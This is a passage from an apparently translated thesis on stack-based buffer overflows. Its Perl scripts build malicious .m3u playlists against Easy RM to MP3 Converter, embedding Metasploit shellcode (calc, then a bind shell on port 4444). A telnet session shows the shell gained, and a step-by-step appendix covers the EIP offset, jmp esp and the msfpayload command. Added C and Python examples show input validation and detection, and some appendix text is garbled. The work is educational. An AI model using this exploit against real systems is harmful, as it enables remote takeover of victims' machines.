# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
As you can see, this shellcode is 344 bytes long, while calc is 144 bytes; you will see the application crash:

Figure 3.26: the 344-byte shellcode crashes the application

This most likely points to a problem with the shellcode size (but if you check the buffer size, you will see that this is not the problem). Or there are invalid characters in the shellcode. You can exclude these characters with Metasploit, but you need to know which characters are allowed and which are not. By default null bytes are excluded, but which other characters?
m3u files contain filenames, so one way to filter is to exclude the characters that are not allowed in filenames and file paths. You can also limit the problem by using a different encoder. We used shikata_ga_nai, but perhaps alpha_upper works better with filenames. Using another encoder may increase the shellcode length, but as we have seen, size is not a big problem.
We will try a tcp shell bind, using the alpha_upper encoder, listening on port 4444. This shellcode is 703 bytes long:
my $file = "exploitrmtomp3.m3u";
my $junk = "A" x 26094;
my $eip = pack('V', 0x01ccf23a);
my $shellcode = "\x90" x 25;

# windows/shell_bind_tcp 703 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, LPORT=4444, RHOST=
$shellcode=$shellcode.\x89\xe1\xdb\xd4\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49 .
\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56 .
\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41 .
\x42\x41\x41\x42\x54\x00\x41\x51\x32\x41\x42\x32\x42\x42 .
\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42 .
\x4a\x4a\x4b\x50\x4d\x4b\x58\x4c\x39\x4b\x4f\x4b\x4f\x4b .
\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47 .
\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x44\x38\x45\x51\x4a .
\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43 .
\x31\x4a\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a .

\x4e\x46\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x44 .
\x34\x45\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a .
\x4b\x4a\x54\x47\x4b\x51\x44\x51\x34\x47\x58\x44\x35\x4a .
\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b\x45\x36\x4c .
\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a .
\x4b\x44\x43\x46\x4c\x4c\x4b\x4d\x59\x42\x4c\x46\x44\x45 .
\x4c\x43\x51\x48\x43\x46\x51\x49\x4b\x45\x34\x4c\x4b\x50 .
\x43\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x42\x50\x45 .
\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e\x43\x58\x4c .
\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f\x48\x56\x43 .
\x56\x50\x53\x45\x36\x45\x38\x50\x33\x50\x32\x42\x48\x43 .
\x47\x43\x43\x47\x42\x51\x4f\x50\x54\x4b\x4f\x48\x50\x42 .
\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48 .
\x56\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x43 .
\x38\x43\x32\x46\x35\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x42 .
\x48\x48\x59\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48 .
\x56\x46\x33\x46\x33\x46\x33\x50\x53\x50\x53\x50\x43\x51 .
\x43\x51\x53\x46\x33\x4b\x4f\x4e\x30\x43\x56\x45\x38\x42 .
\x31\x51\x4c\x42\x46\x46\x33\x4c\x49\x4d\x31\x4a\x35\x42 .
\x48\x4e\x44\x44\x5a\x44\x30\x49\x57\x50\x57\x4b\x4f\x48 .
\x56\x43\x5a\x44\x50\x50\x51\x51\x45\x4b\x4f\x4e\x30\x43 .
\x58\x49\x34\x4e\x4d\x46\x4e\x4b\x59\x50\x57\x4b\x4f\x4e .
\x36\x50\x53\x46\x35\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x50 .
\x49\x4d\x56\x50\x49\x51\x47\x4b\x4f\x48\x56\x50\x50\x50 .
\x54\x50\x54\x46\x35\x4b\x4f\x48\x50\x4a\x33\x45\x38\x4a .
\x47\x44\x39\x48\x46\x43\x49\x50\x57\x4b\x4f\x48\x56\x50 .
\x55\x4b\x4f\x48\x50\x42\x46\x42\x4a\x42\x44\x45\x36\x45 .
\x38\x45\x33\x42\x4d\x4d\x59\x4b\x55\x42\x4a\x46\x30\x50 .

\x59\x47\x59\x48\x4c\x4b\x39\x4a\x47\x43\x5a\x50\x44\x4b .
\x39\x4b\x52\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x47 .
\x32\x46\x4d\x4b\x4e\x51\x52\x46\x4c\x4d\x43\x4c\x4d\x42 .
\x5a\x50\x38\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x42\x52\x4b .
\x4e\x4e\x53\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x49 .
\x46\x51\x4b\x46\x37\x46\x32\x50\x51\x50\x51\x46\x31\x42 .
\x4a\x45\x51\x46\x31\x46\x31\x51\x45\x50\x51\x4b\x4f\x48 .
\x50\x43\x58\x4e\x4d\x4e\x39\x45\x55\x48\x4e\x51\x43\x4b .
\x4f\x49\x46\x43\x5a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x48 .
\x50\x4c\x4b\x46\x37\x4b\x4c\x4c\x43\x49\x54\x45\x34\x4b .
\x4f\x4e\x36\x50\x52\x4b\x4f\x48\x50\x43\x58\x4c\x30\x4c .
\x4a\x44\x44\x51\x4f\x46\x33\x4b\x4f\x48\x56\x4b\x4f\x48 .
\x50\x41\x41;

open($FILE, ">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

Create the m3u file and open it; Easy RM to MP3 hangs:

Now we just Telnet to port 4444
root@bt:/# telnet 192.168.0.197 4444
Trying 192.168.0.197...
Connected to 192.168.0.197.
Escape character is '^]'.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\Easy RM to MP3 Converter>

Conclusion of Chapter III

Chapter III presented the ways in which programmers, testers and, most importantly, hackers find software security bugs. The chapter mainly presented how a hacker finds a stack-based buffer overflow. Determining whether a piece of software has such a bug is very important.
In this chapter we also studied the steps for successfully exploiting a stack-based buffer overflow. The most important part of successfully exploiting a stack-based buffer overflow is how to jump to the shellcode. This was presented in detail in this chapter. There are many ways to jump to the shellcode, and depending on the specific case we use the one best suited to it.
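Every script in this chapter triggers the same defect: a playlist entry is copied into a fixed-size stack buffer without a length check. As an added example (not the converter's code, which is not available; the 260-byte limit and the line format are assumptions), here is how a developer or tester would bound that copy and reject, rather than silently truncate, the oversized entries the chapter feeds in, with the constructed 26094-byte line from 3.3.6 as the test input.

```c
/* Added example, not code from Easy RM to MP3 or from the thesis: a playlist
 * loader that validates every .m3u entry before copying it into a fixed-size
 * stack buffer.  The overflow exploited in chapter III is an unbounded copy
 * of exactly such an entry; the fix is to check the length first and to
 * reject (not silently truncate) anything that does not fit. */
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

#define MAX_ENTRY 260   /* assumed bound: a MAX_PATH-sized filename */

typedef struct {
    size_t accepted;         /* entries that fit and were copied */
    size_t rejected_length;  /* entries longer than the buffer allows */
    size_t rejected_bytes;   /* entries containing control bytes */
} m3u_stats;

char      g_scratch[MAX_ENTRY + 1];  /* destination used by the checks below */
m3u_stats g_demo_stats;              /* filled by m3u_demo() */

/* Copy one playlist line into dst (dst_size bytes, including the NUL).
 * Returns 1 on success, 0 when the entry is rejected (dst is untouched then).
 * reason, if non-NULL, receives 'L' for too long or 'B' for bad bytes. */
int m3u_copy_entry(char *dst, size_t dst_size, const char *line, size_t line_len, char *reason)
{
    if (line_len == 0 || line_len >= dst_size) {   /* >= keeps room for the NUL */
        if (reason) *reason = 'L';
        return 0;
    }
    for (size_t i = 0; i < line_len; i++) {
        unsigned char c = (unsigned char)line[i];
        if (c < 0x20 || c == 0x7f) {                /* control bytes never belong in a path */
            if (reason) *reason = 'B';
            return 0;
        }
    }
    /* The length bound is the real defence: the alpha_upper-encoded payload in
     * 3.4 is printable ASCII and would pass the byte filter, but not the bound. */
    memcpy(dst, line, line_len);
    dst[line_len] = '\0';
    return 1;
}

/* Walk a playlist held in memory, one entry per line ("\n" or "\r\n"),
 * skipping blank lines and '#' directives.  Returns the number of entries
 * accepted and fills st. */
size_t m3u_scan(const char *data, size_t len, m3u_stats *st)
{
    char path[MAX_ENTRY + 1];   /* the fixed stack buffer being protected */
    size_t pos = 0;
    memset(st, 0, sizeof *st);
    while (pos < len) {
        const char *line = data + pos;
        const char *nl = memchr(line, '\n', len - pos);
        size_t line_len = nl ? (size_t)(nl - line) : len - pos;
        pos += line_len + (nl ? 1 : 0);
        if (line_len && line[line_len - 1] == '\r') line_len--;
        if (line_len == 0 || line[0] == '#') continue;
        char reason = 0;
        if (m3u_copy_entry(path, sizeof path, line, line_len, &reason))
            st->accepted++;
        else if (reason == 'L')
            st->rejected_length++;
        else
            st->rejected_bytes++;
    }
    return st->accepted;
}

/* Constructed sample: a normal entry, the 26094-byte line of A's from 3.3.6,
 * and an entry with an embedded control byte.  Returns the accepted count
 * and leaves the full tally in g_demo_stats. */
size_t m3u_demo(void)
{
    const char head[] = "#EXTM3U\r\nsong.rm\r\n";
    const char tail[] = "\r\nbad\x01name.rm\r\n";
    size_t big = 26094;
    size_t total = (sizeof head - 1) + big + (sizeof tail - 1);
    char *buf = malloc(total);
    if (!buf) return 0;
    memcpy(buf, head, sizeof head - 1);
    memset(buf + (sizeof head - 1), 'A', big);
    memcpy(buf + (sizeof head - 1) + big, tail, sizeof tail - 1);
    size_t n = m3u_scan(buf, total, &g_demo_stats);
    free(buf);
    return n;
}
```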

PROPOSAL FOR A SECURE SOFTWARE DEVELOPMENT PROCESS

From the study of software security vulnerabilities, we see that making sure software is secure is extremely important. To make sure a software product is secure, the following are indispensable:

Make the software secure from the design stage. Ensuring security right from the design stage avoids very large risks of software security bugs during deployment. Software that is secured at the design stage is easier to keep secure as a product.

Follow a strict software development process, completely and in the right order. This avoids mistakes developers may make during design.

Use secure design patterns. This is the way developers always choose. Secure design patterns have been tested and evaluated; using them avoids the risk of introducing software security bugs.

Have an experienced team of programmers. A key factor is a team of programmers experienced in software development. They are the people who directly write the software product, so they play an important role in making the product secure.

Perform software testing. This is a mandatory step that cannot be skipped if the product is to be secure.

Hire hackers to test the software by attacking it, in order to find bugs. The current trend among developers is to hire skilled hackers to attack their products, and from this to discover bugs they had not anticipated.

CONCLUSION AND FUTURE DIRECTIONS
Exploiting software security bugs is a relatively difficult and complex job. Mastering and thoroughly researching all of the issues requires much time and effort. After a period of research and study, my thesis is complete. The main contents the thesis accomplished are:
1) An overview of software.
2) The processes for developing a software product.
3) Software bugs, software security bugs, and some common software security bugs.
4) The ways in which programmers, testers and hackers discover software security bugs.
5) A detailed analysis of the stack-based buffer overflow, how to find this bug, and the steps to exploit it successfully.
6) The ways hackers jump to shellcode.
7) A successful experimental exploit of a stack-based buffer overflow.
The future direction of this thesis is to extend the study of stack-based buffer overflows to the harder case where no memory region is large enough to hold the shellcode, so the shellcode must be split and stored across small memory fragments; to extend the study of the SEH technique for jumping to shellcode; and to extend the study to other bugs such as heap-based buffer overflows, double free and use after free, as well as how to find and exploit them.

REFERENCES

[1]. Stack Based Overflows, Corelan Team.
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
[2]. Stack Based Overflows: jumping to shellcode, Corelan Team.
https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basictutorial-part-2/
[3]. Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness (2007). Gray Hat Hacking: The Ethical Hacker's Handbook, Second Edition.
[4]. Greg Hoglund and Gary McGraw (2004). Exploiting Software: How to Break Code.
[5]. Gary McGraw (2006). Software Security: Building Security In.
[6]. Academy of Cryptography Techniques (Học viện Kỹ thuật Mật mã) (2006). Giáo trình Công nghệ phần mềm (Software Engineering textbook).
[7]. Buffer Overflow. http://www.ksyash.com/2011/01/buffer-overflow-2/
[8]. Double Free. https://www.owasp.org/index.php/Double_Free
[9]. Avoiding Buffer Overflows And Underflows. https://developer.apple.com/library/mac/#documentation/security/conceptual/SecureCodingGuide/Articles/BufferOverflows.html
[10]. http://samate.nist.gov/SRD/view.php

APPENDICES

1. APPENDIX 1: THE PROGRAM WHEN LOADED INTO MEMORY

When processes are loaded into memory, they are divided into 6 segments as follows:
1.1. The .text segment

This segment corresponds to the code part of the binary executable file. It contains the instructions (machine code) that carry out the program's tasks. This segment is marked read-only, and writing to it causes an error. Its size is fixed at run time, when the process is first loaded.
1.2. The .data segment

This segment is used to store global variables that are initialized, such as: int a=0; Its size is also fixed at run time.
1.3. The .bss segment

The below stack section (.bss) is used to store global variables that are not initialized, such as: int a;
The size of this segment is also fixed at run time.
1.4. The Heap segment

This segment is used to allocate dynamic variables and grows from low addresses towards high addresses in memory. In C, allocation and freeing are done through the two functions malloc() and free(). Example: int *i = malloc(sizeof(int));

1.5. The Stack segment

The stack segment holds the function calls of recursive procedures and grows from high memory addresses towards low memory addresses on most systems.
1.6. The environment variables and arguments segment

This segment stores a copy of the system-level variables that the process may require during execution. This segment is writable.
2. APPENDIX 2: THE PROCESS MEMORY

Every Windows application uses parts of memory. There are 3 main components:

Code segment: the instructions the processor executes (EIP points to the next instruction to be executed)

Data segment: variables, dynamic buffers

Stack segment: used to pass data (arguments) into functions, and used as a place to store variables. The stack starts (the stack bottom) at the very end of the virtual memory page and grows downward. A PUSH adds to the top of the stack; a POP takes it off (4 bytes) and moves it into a register.
If you want to access the stack directly, you can use the ESP register (Stack Pointer). This register always points to the top of the stack, the lowest address of the stack.
After a PUSH, ESP points to a lower address (the address is decreased by the size of the data pushed onto the stack, usually 4 bytes for an address/register). The decrease is usually done before the data is placed on the stack (depending on the implementation: if ESP already points to the next free position in the stack, the decrease is done after placing the data on the stack).
After a POP, ESP points to a higher address (the address is increased, usually by 4 bytes). The increase happens after the element is removed from the stack.
When a function/subroutine starts, a stack frame is created. This frame saves the parameters of the previous procedure and is used to pass parameters to the subroutine. The current position of the pointer can be accessed via ESP, the stack pointer. The base of the current function is held in the base pointer register (EBP), or frame pointer.

2.1. Common registers (Intel, x86)

EAX, accumulator: used for calculations and for storing data (in function calls, for instance). Used in basic operations such as add, subtract, compare.

EBX, base: (has nothing to do with the base pointer) has no specific purpose and is used to store data.

ECX, counter: used for loops; ECX counts down.

EDX, data: an extension of EAX. Allows more complex calculations (multiply, divide) by extending the data storage available to the calculation (for example the quotient is stored in EAX and the remainder in EDX).

ESP, stack pointer: points to the top of the stack.

EBP, base pointer: an offset relative to the top of the stack.

ESI, source index: holds the location of the input data.

EDI, destination index: points to where the result of an operation is stored.

EIP, instruction pointer: points to the next instruction to be executed

2.2. Process Memory

When an application starts in a Win32 environment, a process is created and virtual memory is assigned to it. For a 32-bit process, addresses range from 0x00000000 to 0xFFFFFFFF. Of this, 0x00000000 to 0x7FFFFFFF is assigned to user-land, and 0x80000000 to 0xFFFFFFFF to kernel-land. Windows uses a flat memory model, meaning the CPU can directly, sequentially and linearly address all available address locations without using segmentation or paging.
Kernel-land memory can only be accessed by the OS.
When the process is created, the PEB (Process Execution Block) and TEB (Thread Environment Block) are also created.
The PEB contains all user-land parameters associated with the current process:

Location of the main executable

Pointer to the loader data (used to list all dlls/modules loaded in the process)

Pointer to the heap information

The TEB describes the state of the process, including:

Location of the PEB in memory

Location of the stack of the thread it belongs to

Pointer to the first entry of the SEH chain

Each thread inside a process has a TEB.

Appendix figure: diagram of the memory of a Win32 process

The text segment in the program image is read-only, and contains only application code. This prevents modification of the application code. The data segment is used to store global and static variables. The data segment is used to initialize global variables, strings and constants.
The data segment is writable and has a fixed size. The heap segment is used for the rest of the program's variables. It can grow larger or smaller as designed. All memory in the heap is managed by the allocation and deallocation algorithms. A memory region is reserved by the algorithm. The heap grows towards higher addresses.
In a dll, the code, the imports (the list of functions used by the dll or by other dlls and the application) and the exports are part of the .text segment.
3. APPENDIX 3

C, C++, Perl: these are high-level programming languages.

Readme: usually the name of a text file on the installation disk of an application program, containing last-minute information not found in the program's user documentation. A typical file name.

instance methods: object-oriented methods, used in object-oriented programming languages.

thread: a thread (a processor thread)

Disassembly: a computer program whose task is to translate machine language into the low-level assembly language.

Debugger: a computer program used to test and detect bugs in other computer programs.

NOP (No Operation Performed): on meeting this instruction the program passes over it without performing any action.

Opcode (operation code): the term for codes written in machine language, which instruct the machine in the operations it must perform. The structure of an opcode depends on the machine and on the machine language the processor can recognize.

Payload: the main data portion. Here the Payload is the shellcode supplied by metasploit.

RET: an instruction of the assembly language; its effect is to add 4 bytes to ESP.

Devcpp: a computer program that supports writing and compiling the C/C++ programming language.
4. APPENDIX 4: OPCODE TABLE OF JUMP INSTRUCTIONS AND FLAGS

Code         Mnemonic        Description
77 cb        JA rel8         Jump short if above (CF=0 and ZF=0)
73 cb        JAE rel8        Jump short if above or equal (CF=0)
72 cb        JB rel8         Jump short if below (CF=1)
76 cb        JBE rel8        Jump short if below or equal (CF=1 or ZF=1)
72 cb        JC rel8         Jump short if carry (CF=1)
E3 cb        JCXZ rel8       Jump short if CX register is 0
E3 cb        JECXZ rel8      Jump short if ECX register is 0
74 cb        JE rel8         Jump short if equal (ZF=1)
7F cb        JG rel8         Jump short if greater (ZF=0 and SF=OF)
7D cb        JGE rel8        Jump short if greater or equal (SF=OF)
7C cb        JL rel8         Jump short if less (SF<>OF)
7E cb        JLE rel8        Jump short if less or equal (ZF=1 or SF<>OF)
76 cb        JNA rel8        Jump short if not above (CF=1 or ZF=1)
72 cb        JNAE rel8       Jump short if not above or equal (CF=1)
73 cb        JNB rel8        Jump short if not below (CF=0)
77 cb        JNBE rel8       Jump short if not below or equal (CF=0 and ZF=0)
73 cb        JNC rel8        Jump short if not carry (CF=0)
75 cb        JNE rel8        Jump short if not equal (ZF=0)
7E cb        JNG rel8        Jump short if not greater (ZF=1 or SF<>OF)
7C cb        JNGE rel8       Jump short if not greater or equal (SF<>OF)
7D cb        JNL rel8        Jump short if not less (SF=OF)
7F cb        JNLE rel8       Jump short if not less or equal (ZF=0 and SF=OF)
71 cb        JNO rel8        Jump short if not overflow (OF=0)
7B cb        JNP rel8        Jump short if not parity (PF=0)
79 cb        JNS rel8        Jump short if not sign (SF=0)
75 cb        JNZ rel8        Jump short if not zero (ZF=0)
70 cb        JO rel8         Jump short if overflow (OF=1)
7A cb        JP rel8         Jump short if parity (PF=1)
7A cb        JPE rel8        Jump short if parity even (PF=1)
7B cb        JPO rel8        Jump short if parity odd (PF=0)
78 cb        JS rel8         Jump short if sign (SF=1)
74 cb        JZ rel8         Jump short if zero (ZF=1)
0F 87 cw/cd  JA rel16/32     Jump near if above (CF=0 and ZF=0)
0F 83 cw/cd  JAE rel16/32    Jump near if above or equal (CF=0)
0F 82 cw/cd  JB rel16/32     Jump near if below (CF=1)
0F 86 cw/cd  JBE rel16/32    Jump near if below or equal (CF=1 or ZF=1)
0F 82 cw/cd  JC rel16/32     Jump near if carry (CF=1)
0F 84 cw/cd  JE rel16/32     Jump near if equal (ZF=1)
0F 84 cw/cd  JZ rel16/32     Jump near if 0 (ZF=1)
0F 8F cw/cd  JG rel16/32     Jump near if greater (ZF=0 and SF=OF)
0F 8D cw/cd  JGE rel16/32    Jump near if greater or equal (SF=OF)
0F 8C cw/cd  JL rel16/32     Jump near if less (SF<>OF)
0F 8E cw/cd  JLE rel16/32    Jump near if less or equal (ZF=1 or SF<>OF)
0F 86 cw/cd  JNA rel16/32    Jump near if not above (CF=1 or ZF=1)
0F 82 cw/cd  JNAE rel16/32   Jump near if not above or equal (CF=1)
0F 83 cw/cd  JNB rel16/32    Jump near if not below (CF=0)
0F 87 cw/cd  JNBE rel16/32   Jump near if not below or equal (CF=0 and ZF=0)
0F 83 cw/cd  JNC rel16/32    Jump near if not carry (CF=0)
0F 85 cw/cd  JNE rel16/32    Jump near if not equal (ZF=0)
0F 8E cw/cd  JNG rel16/32    Jump near if not greater (ZF=1 or SF<>OF)
0F 8C cw/cd  JNGE rel16/32   Jump near if not greater or equal (SF<>OF)
0F 8D cw/cd  JNL rel16/32    Jump near if not less (SF=OF)
0F 8F cw/cd  JNLE rel16/32   Jump near if not less or equal (ZF=0 and SF=OF)
0F 81 cw/cd  JNO rel16/32    Jump near if not overflow (OF=0)
0F 8B cw/cd  JNP rel16/32    Jump near if not parity (PF=0)
0F 89 cw/cd  JNS rel16/32    Jump near if not sign (SF=0)
0F 85 cw/cd  JNZ rel16/32    Jump near if not zero (ZF=0)
0F 80 cw/cd  JO rel16/32     Jump near if overflow (OF=1)
0F 8A cw/cd  JP rel16/32     Jump near if parity (PF=1)
0F 8A cw/cd  JPE rel16/32    Jump near if parity even (PF=1)
0F 8B cw/cd  JPO rel16/32    Jump near if parity odd (PF=0)
0F 88 cw/cd  JS rel16/32     Jump near if sign (SF=1)
0F 84 cw/cd  JZ rel16/32     Jump near if 0 (ZF=1)

1.

5.

PH LC 5 : CC BC THC HIN DEMO

Bc 1: Download Easy RM to MP3 Converter ti


http://www.rm-to-mp3.net/EasyRMtoMP3Converter.exe
Bc 2: ci t Easy RM to MP3 Converter
Bc 3: Tm li
Vit code perl sau, save thnh crash.pl
my $file= crash.m3u;
my $junk= A x 10000;
open($FILE,>$file);
print $FILE $junk;
close($FILE);
print m3u File Created successfully\n;

Th vi 10000 A

x 10000

Th vi 20000 A

x 20000

Th vi 30000 A

x 30000

Bc 4: Mc vo debugger bng cch click vo debug


Bc 5: Xc nh kch thc b m ghi chnh xc vo EIP
Bng cch chia i khong 20000-30000. t 25000A v 5000B

my $file= "crash25000.m3u";
my $junk = "A" x 25000;
my $junk2 = "B" x 5000;
open($FILE,">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";
EIP=42424242. Kt lun EIP nm khong 25000 30000
Xch nh chnh xc EIP bng cch s dng 2 tool pattern_create.rb vpattern_offset.rb trong th mc
tool trong metasploit framework3
Bc 6: bt bactrack, vo th mc /pentest/exploits/framework/tools
./pattern_create.rb 5000
c kt qu a vo $junk2 bc sau
Bc 7: Thay i code perl

my $file= "crash25000.m3u";
my $junk = "A" x 25000;
my $junk2 = dua 5000 ky tu vua tao vao day
open($FILE,">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";
Bc 8: s dng ./pattern_offset.rb 0x356A4234 5000
1064 -> EIP vi tr 26065
Bc 9: thay i code perl xc nh chnh xc EIP

my $file= "eipcrash.m3u";
my $junk= "A" x 26064;
my $eip = "BBBB";
my $espdata = "C" x 1000;
open($FILE,">$file");
print $FILE $junk.$eip.$espdata;
close($FILE);
print "m3u File Created successfully\n";
Step 10: Find memory space to hold the shellcode
Use the Perl code below with a simulated shellcode 144 characters long (it may be more or fewer)

my $file= "test1.m3u";
my $junk= "A" x 26064;
my $eip = "BBBB";
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" .
"5ABCDEFGHIJK6ABCDEFGHIJK" .
"7ABCDEFGHIJK8ABCDEFGHIJK" .
"9ABCDEFGHIJKAABCDEFGHIJK".
"BABCDEFGHIJKCABCDEFGHIJK";
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
Looking at the ESP register, its contents are DEFGHIJK2AB... Conclusion: ESP is 4 bytes past EIP; ESP starts at the 5th character of the shellcode.
Step 11: Add 4 characters in front of the shellcode

my $file= "test1.m3u";
my $junk= "A" x 26064;
my $eip = "BBBB";
my $preshellcode = "XXXX";
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" .
"5ABCDEFGHIJK6ABCDEFGHIJK" .
"7ABCDEFGHIJK8ABCDEFGHIJK" .
"9ABCDEFGHIJKAABCDEFGHIJK".
"BABCDEFGHIJKCABCDEFGHIJK";
open($FILE,">$file");
print $FILE $junk.$eip.$preshellcode.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

Now we control EIP.

There is a 144-byte memory region to write the shellcode into, 4 bytes past EIP.

The ESP register points to the start of the shellcode at address 0x000ff730.

Step 12: Write the shellcode's first address into EIP; the shellcode is 25 NOPs + break + 25 NOPs

my $file= "test1.m3u";
my $junk= "A" x 26064;
my $eip = pack('V',0x000ff730);
my $shellcode = "\x90" x 25;
$shellcode = $shellcode."\xcc";
$shellcode = $shellcode."\x90" x 25;
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";


The shellcode does not run because the address contains null bytes (\x00). This is the direct way of calling the shellcode's start address, but it is not a good approach. We will try a better way of jumping to the shellcode.
Step 13: First, we need to find the opcodes for jmp esp

Open Easy RM to MP3, then open OllyDbg and attach OllyDbg to Easy RM to MP3

Search for all commands and enter jmp esp

Looking at the opcode column we see that the opcode is FFE4 at 7C941EED

Step 14: Find the opcode in the loaded DLLs

Choose View > Executable modules

Select each module and press Ctrl+F to search for jmp esp until it is found

In the module C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll, at address 01A4F23A there is a jmp esp instruction with opcode FFE4

If the SHELL32.dll module is used instead, the opcode is at address 7CA58265

Rewrite the Perl code

my $file= "test1.m3u";
my $junk= "A" x 26064;
my $eip = pack('V',0x01a4f23a);
my $shellcode = "\x90" x 25;
$shellcode = $shellcode."\xcc";
$shellcode = $shellcode."\x90" x 25;
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
It runs successfully. However, if the address written into EIP contains null bytes, we again have to use a different method to jump to the shellcode.
Step 15: Get the shellcode to complete the exploit
Open BackTrack and type the following commands
cd ~
msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=4444 R | msfencode -e x86/alpha_upper -t perl
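Seen from the defender's side, every file built in steps 3 to 14 has a shape that no real playlist has: a single "entry" tens of thousands of bytes long, made of one repeated byte, followed by non-text bytes such as a run of 0x90. Those properties are cheap to check before a playlist reaches the parser, or in a mail or download gateway. As an added example, not part of the thesis, the following Python scanner flags such playlists; the thresholds (260-byte entry length, a 16-byte NOP run, a 1000-byte run of one repeated byte) are assumptions chosen for illustration, and both sample playlists are constructed here (the crafted one mirrors the layout of the test1.m3u file from step 12).

```python
"""Heuristic scanner for crafted .m3u playlists (added example, not from the thesis)."""
import re

# Thresholds are assumptions for illustration, not values from the page.
MAX_ENTRY_LEN = 260   # a playlist entry should fit a Windows MAX_PATH-style path or a URL
NOP_RUN = 16          # a run of 0x90 bytes this long looks like a NOP sled, not a path
REPEAT_RUN = 1000     # the same byte repeated this often is filler, not a path

_REPEAT_RE = re.compile(rb"(.)\1{%d,}" % (REPEAT_RUN - 1), re.DOTALL)


def scan_m3u(data: bytes):
    """Return a list of (line_no, finding, detail) tuples for a playlist's raw bytes."""
    findings = []
    for line_no, raw in enumerate(data.splitlines(), start=1):
        line = raw.rstrip(b"\r")
        if not line or line.startswith(b"#"):
            continue  # blank lines and #EXTM3U / #EXTINF directives are not entries
        if len(line) > MAX_ENTRY_LEN:
            findings.append((line_no, "oversized_entry", len(line)))
        try:
            text = line.decode("utf-8")
        except UnicodeDecodeError:
            # Raw machine code and packed addresses are rarely valid UTF-8.
            findings.append((line_no, "invalid_utf8", None))
        else:
            ctrl = sum(1 for ch in text if ord(ch) < 0x20 or ord(ch) == 0x7F)
            if ctrl:
                findings.append((line_no, "control_bytes", ctrl))
        if b"\x90" * NOP_RUN in line:
            findings.append((line_no, "nop_sled", line.count(b"\x90")))
        m = _REPEAT_RE.search(line)
        if m:
            findings.append((line_no, "repeated_byte_run", len(m.group(0))))
    return findings


def is_suspicious(data: bytes) -> bool:
    """True when any heuristic fires; a gateway would quarantine such a file for review."""
    return bool(scan_m3u(data))


# Constructed samples, embedded so the example runs offline.
BENIGN_M3U = (
    b"#EXTM3U\n"
    b"#EXTINF:213,Sample Artist - Sample Title\n"
    b"C:\\Music\\sample.mp3\n"
    b"http://example.invalid/stream.mp3\n"
)
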